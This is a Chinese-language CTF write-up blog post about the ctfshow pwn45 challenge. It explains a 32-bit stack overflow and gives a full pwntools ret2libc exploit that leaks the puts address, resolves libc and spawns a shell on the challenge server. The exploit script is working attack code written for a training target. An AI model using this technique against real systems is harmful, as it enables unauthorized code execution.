每日一Pwn 2024/12/4

pwn45

32位 无 system 无 "/bin/sh"

检查保护,只开了代码执行保护

image-20241204205357908

检查程序,发现溢出点

ssize_t ctfshow()
{
  char buf[103]; // [esp+Dh] [ebp-6Bh] BYREF

  return read(0, buf, 0xC8u);
}

这里查询函数地址,可以看到put@plt的地址已知,这里可以打32位的ret2libc

image-20241204205821895


32ret2libc

和64位的大差不大,主要区别在参数的传递和puts地址的接收上

from pwn import *
from LibcSearcher import *

io = remote('',)
# io = process("")
elf = ELF('')
# libc= ELF('libc.so.6')

main_add = 
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

print("Puts_got: ",hex(puts_got))
print("Puts_plt: ",hex(puts_plt))

offset=

payload1 = b'a' * (offset+4) + p32(puts_plt) + p32(main_add) + p32(puts_got)
io.sendlineafter(b'', payload1)
puts_addr = u32(io.recvuntil(b'\xf7')[-4:])
print("Puts_addr: ",hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)

libc_base = puts_addr - libc.dump('puts')
system_add = libc_base + libc.dump('system')
bin_sh_add = libc_base + libc.dump('str_bin_sh')

# libc_base = puts_addr - libc.symbols['puts']
# system_add = libc_base + libc.symbols['system']
# bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

payload2 = b'a' * (offset+4) + p32(system_add) + p32(0) + p32(bin_sh_add)
io.sendlineafter(b'', payload2)

io.interactive()

查找相应地址以及参数填入

from pwn import *
from LibcSearcher import *

io = remote('pwn.challenge.ctf.show',28158)
# io = process("./pwn")
elf = ELF('./pwn')
# libc= ELF(elf.libc.path)

main_add = 0x0804866D
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

print("Puts_got: ",hex(puts_got))
print("Puts_plt: ",hex(puts_plt))

offset=0x6B

payload1 = b'a' * (offset+4) + p32(puts_plt) + p32(main_add) + p32(puts_got)
io.sendafter(b'O.o?', payload1)
puts_addr = u32(io.recvuntil(b'\xf7')[-4:])
print("Puts_addr: ",hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)   # libc6-i386_2.27-3ubuntu1_amd64

libc_base = puts_addr - libc.dump('puts')
system_add = libc_base + libc.dump('system')
bin_sh_add = libc_base + libc.dump('str_bin_sh')

# libc_base = puts_addr - libc.symbols['puts']
# system_add = libc_base + libc.symbols['system']
# bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

payload2 = b'a' * (offset+4) + p32(system_add) + p32(0) + p32(bin_sh_add)

io.sendafter(b'O.o?', payload2)

io.interactive()

本地要先加载对应libc

image-20241205235828605

ldd和patchelf命令

查看正确的的libc和ld对应的版本

ldd 1
linux-vdso.so.1 (0x00007ffcfe6c5000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f144f058000)
/lib64/ld-linux-x86-64.so.2 (0x00007f144f292000)

修改libc

patchelf --replace-needed [原libc] [libc路径] [附件路径]

修改ld

patchelf --set-interpreter [ld路径] [附件路径]

或者可以直接不修改附件,直接在代码中加载对应的libc即可

libc= ELF(elf.libc.path)

这里推荐后者

评论

  1. 博主
    1 月前
    2024-12-06 0:09:53

    好吧,其实是我的问题没有加载正确的libc导致他的环境和远程的不一样,误会附件了QAQ

    来自重庆

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇